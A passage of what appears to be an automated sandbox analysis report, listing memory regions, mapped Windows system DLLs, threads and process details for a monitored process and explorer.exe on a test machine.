= 5895 start_va = 0x7ff8fdb60000 end_va = 0x7ff8fdc06fff monitored = 0 entry_point = 0x7ff8fdb6b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5896 start_va = 0x7ff8fdd40000 end_va = 0x7ff8fde82fff monitored = 0 entry_point = 0x7ff8fdd68210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5897 start_va = 0x7ff8fe040000 end_va = 0x7ff8fe09afff monitored = 0 entry_point = 0x7ff8fe0538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5898 start_va = 0x7ff8fe0a0000 end_va = 0x7ff8fe13cfff monitored = 0 entry_point = 0x7ff8fe0a78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5899 start_va = 0x7ff8ff8d0000 end_va = 0x7ff8ffa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5900 start_va = 0x7ff8f3d90000 end_va = 0x7ff8f3e5dfff monitored = 0 entry_point = 0x7ff8f3dc14c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 5901 start_va = 0x7ff8fdf10000 end_va = 0x7ff8fdfd0fff monitored = 0 entry_point = 0x7ff8fdf30da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5902 start_va = 0x7ff8fc9b0000 end_va = 0x7ff8fca64fff monitored = 0 entry_point = 0x7ff8fc9f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5903 start_va = 0x7ff8fbd80000 end_va = 0x7ff8fbda8fff monitored = 0 entry_point = 0x7ff8fbd94530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 5904 start_va = 0x7ff8f70e0000 end_va = 0x7ff8f7215fff monitored = 0 entry_point = 0x7ff8f710f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 5905 start_va = 0x7ff8f95c0000 end_va = 0x7ff8f9a52fff monitored = 0 entry_point = 0x7ff8f95cf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 5917 start_va = 0x7ff8fa630000 end_va = 0x7ff8fa642fff monitored = 0 entry_point = 0x7ff8fa632760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 5918 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 5919 start_va = 0x7ff8f4b10000 end_va = 0x7ff8f4b37fff monitored = 0 entry_point = 0x7ff8f4b18c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 5920 start_va = 0x7ff8fdc10000 end_va = 0x7ff8fdcb6fff monitored = 0 entry_point = 0x7ff8fdc258d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5921 start_va = 0x7ff8fa5d0000 end_va = 0x7ff8fa5ebfff monitored = 0 entry_point = 0x7ff8fa5d37a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5922 start_va = 0x5a0000 end_va = 0x5cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Thread: id = 387 os_tid = 0x624 Thread: id = 388 os_tid = 0x620 Thread: id = 389 os_tid = 0x618 Thread: id = 390 os_tid = 0x614 Thread: id = 391 os_tid = 0x610 Thread: id = 392 os_tid = 0x628 Process: id = "90" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x14fe8000" os_pid = "0x690" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "88" os_parent_pid = "0x678" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010b7c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5974 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5975 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5976 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5977 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5978 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 5979 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 5980 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 5981 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5982 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5983 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5984 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 5985 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 5986 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5987 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5988 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5989 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 5990 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 5991 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 5992 start_va = 0x4c0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 5993 start_va = 0x5c0000 end_va = 0x747fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 5994 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 5995 start_va = 0x760000 end_va = 0x763fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 5996 start_va = 0x770000 end_va = 0x782fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 5997 start_va = 0x790000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 5998 start_va = 0x7a0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 5999 start_va = 0x7b0000 end_va = 0x930fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 6000 start_va = 0x940000 end_va = 0x1d3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 6001 start_va = 0x1d40000 end_va = 0x213afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d40000" filename = "" Region: id = 6002 start_va = 0x2140000 end_va = 0x2476fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6003 start_va = 0x2480000 end_va = 0x2480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002480000" filename = "" Region: id = 6004 start_va = 0x2490000 end_va = 0x24a7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db") Region: id = 6005 start_va = 0x24b0000 end_va = 0x24b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 6006 start_va = 0x24c0000 end_va = 0x24c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024c0000" filename = "" Region: id = 6007 start_va = 0x24d0000 end_va = 0x24fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 6008 start_va = 0x2500000 end_va = 0x2501fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002500000" filename = "" Region: id = 6009 start_va = 0x2510000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 6010 start_va = 0x2590000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 6011 start_va = 0x2610000 end_va = 0x268ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 6012 start_va = 0x2690000 end_va = 0x270ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 6013 start_va = 0x2710000 end_va = 0x27effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 6014 start_va = 0x27f0000 end_va = 0x286ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 6015 start_va = 0x2870000 end_va = 0x28effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 6016 start_va = 0x28f0000 end_va = 0x296ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 6017 start_va = 0x2970000 end_va = 0x2971fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002970000" filename = "" Region: id = 6018 start_va = 0x2980000 end_va = 0x2981fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 6019 start_va = 0x2990000 end_va = 0x2a4bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 6020 start_va = 0x2a50000 end_va = 0x2a53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a50000" filename = "" Region: id = 6021 start_va = 0x2a60000 end_va = 0x2b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 6022 start_va = 0x2b60000 end_va = 0x2b66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 6023 start_va = 0x2b70000 end_va = 0x2b71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b70000" filename = "" Region: id = 6024 start_va = 0x2b80000 end_va = 0x3bbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 6025 start_va = 0x3bc0000 end_va = 0x3bc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bc0000" filename = "" Region: id = 6026 start_va = 0x3bd0000 end_va = 0x3bd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bd0000" filename = "" Region: id = 6027 start_va = 0x3be0000 end_va = 0x3be0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 6028 start_va = 0x3bf0000 end_va = 0x3bf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003bf0000" filename = "" Region: id = 6029 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 6030 start_va = 0x3c80000 end_va = 0x3c81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 6031 start_va = 0x3c90000 end_va = 0x3c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 6032 start_va = 0x3ca0000 end_va = 0x3ca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 6033 start_va = 0x3cb0000 end_va = 0x3cb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 6034 start_va = 0x3cc0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 6035 start_va = 0x3dc0000 end_va = 0x3dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003dc0000" filename = "" Region: id = 6036 start_va = 0x3dd0000 end_va = 0x3ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dd0000" filename = "" Region: id = 6037 start_va = 0x3de0000 end_va = 0x3deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003de0000" filename = "" Region: id = 6038 start_va = 0x3df0000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003df0000" filename = "" Region: id = 6039 start_va = 0x3e00000 end_va = 0x3e00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 6040 start_va = 0x3e10000 end_va = 0x3e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 6041 start_va = 0x3e20000 end_va = 0x3e20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 6042 start_va = 0x3e30000 end_va = 0x3e33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 6043 start_va = 0x3e40000 end_va = 0x3e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 6044 start_va = 0x3e50000 end_va = 0x3e50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e50000" filename = "" Region: id = 6045 start_va = 0x3e60000 end_va = 0x3e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 6046 start_va = 0x3e70000 end_va = 0x3e71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e70000" filename = "" Region: id = 6047 start_va = 0x3e80000 end_va = 0x3eb8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e80000" filename = "" Region: id = 6048 start_va = 0x3ec0000 end_va = 0x3ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 6049 start_va = 0x3ed0000 end_va = 0x3ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 6050 start_va = 0x3ef0000 end_va = 0x3f13fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 6051 start_va = 0x3f20000 end_va = 0x3f43fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f20000" filename = "" Region: id = 6052 start_va = 0x3f50000 end_va = 0x3f51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f50000" filename = "" Region: id = 6053 start_va = 0x3f60000 end_va = 0x3fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f60000" filename = "" Region: id = 6054 start_va = 0x3fe0000 end_va = 0x3fe3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 6055 start_va = 0x3ff0000 end_va = 0x4034fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 6056 start_va = 0x4040000 end_va = 0x4043fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 6057 start_va = 0x4050000 end_va = 0x40ddfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 6058 start_va = 0x4160000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 6059 start_va = 0x41e0000 end_va = 0x425ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 6060 start_va = 0x4260000 end_va = 0x4260fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 6061 start_va = 0x4270000 end_va = 0x42effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004270000" filename = "" Region: id = 6062 start_va = 0x42f0000 end_va = 0x436ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 6063 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6064 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 6065 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 6066 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 6067 start_va = 0x7ff7fb9c0000 end_va = 0x7ff7fbe07fff monitored = 0 entry_point = 0x7ff7fba5e090 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 6068 start_va = 0x7ff8f1d90000 end_va = 0x7ff8f1d9bfff monitored = 0 entry_point = 0x7ff8f1d918b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 6069 start_va = 0x7ff8f1da0000 end_va = 0x7ff8f1decfff monitored = 0 entry_point = 0x7ff8f1dad180 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 6070 start_va = 0x7ff8f1df0000 end_va = 0x7ff8f28fafff monitored = 0 entry_point = 0x7ff8f1f3a540 region_type = mapped_file name = "twinui.dll" filename = "\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 6071 start_va = 0x7ff8f2900000 end_va = 0x7ff8f294ffff monitored = 0 entry_point = 0x7ff8f2902580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 6072 start_va = 0x7ff8f2950000 end_va = 0x7ff8f2deffff monitored = 0 entry_point = 0x7ff8f29e8740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 6073 start_va = 0x7ff8f2df0000 end_va = 0x7ff8f2e39fff monitored = 0 entry_point = 0x7ff8f2df5800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 6074 start_va = 0x7ff8f2e40000 end_va = 0x7ff8f2ea9fff monitored = 0 entry_point = 0x7ff8f2e55e90 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 6075 start_va = 0x7ff8f2eb0000 end_va = 0x7ff8f2f14fff monitored = 0 entry_point = 0x7ff8f2eb4c50 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 6076 start_va = 0x7ff8f2f20000 end_va = 0x7ff8f3193fff monitored = 0 entry_point = 0x7ff8f2f90400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 6077 start_va = 0x7ff8f31a0000 end_va = 0x7ff8f31b4fff monitored = 0 entry_point = 0x7ff8f31a2c90 region_type = mapped_file name = "settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 6078 start_va = 0x7ff8f31e0000 end_va = 0x7ff8f3290fff monitored = 0 entry_point = 0x7ff8f31f08f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 6079 start_va = 0x7ff8f3d90000 end_va = 0x7ff8f3e5dfff monitored = 0 entry_point = 0x7ff8f3dc14c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 6080 start_va = 0x7ff8f3e90000 end_va = 0x7ff8f3f88fff monitored = 0 entry_point = 0x7ff8f3ed8000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 6081 start_va = 0x7ff8f4b10000 end_va = 0x7ff8f4b37fff monitored = 0 entry_point = 0x7ff8f4b18c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 6082 start_va = 0x7ff8f55e0000 end_va = 0x7ff8f564ffff monitored = 0 entry_point = 0x7ff8f5602960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 6083 start_va = 0x7ff8f5c50000 end_va = 0x7ff8f5ca4fff monitored = 0 entry_point = 0x7ff8f5c53fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 6084 start_va = 0x7ff8f6b90000 end_va = 0x7ff8f6d4cfff monitored = 0 entry_point = 0x7ff8f6bbaf90 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 6085 start_va = 0x7ff8f70e0000 end_va = 0x7ff8f7215fff monitored = 0 entry_point = 0x7ff8f710f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 6086 start_va = 0x7ff8f8310000 end_va = 0x7ff8f841dfff monitored = 0 entry_point = 0x7ff8f835eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 6087 start_va = 0x7ff8f87b0000 end_va = 0x7ff8f8841fff monitored = 0 entry_point = 0x7ff8f87fa780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 6088 start_va = 0x7ff8f9250000 end_va = 0x7ff8f9400fff monitored = 0 entry_point = 0x7ff8f92e61a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 6089 start_va = 0x7ff8f95c0000 end_va = 0x7ff8f9a52fff monitored = 0 entry_point = 0x7ff8f95cf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 6090 start_va = 0x7ff8f9a60000 end_va = 0x7ff8f9ac6fff monitored = 0 entry_point = 0x7ff8f9a7e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: 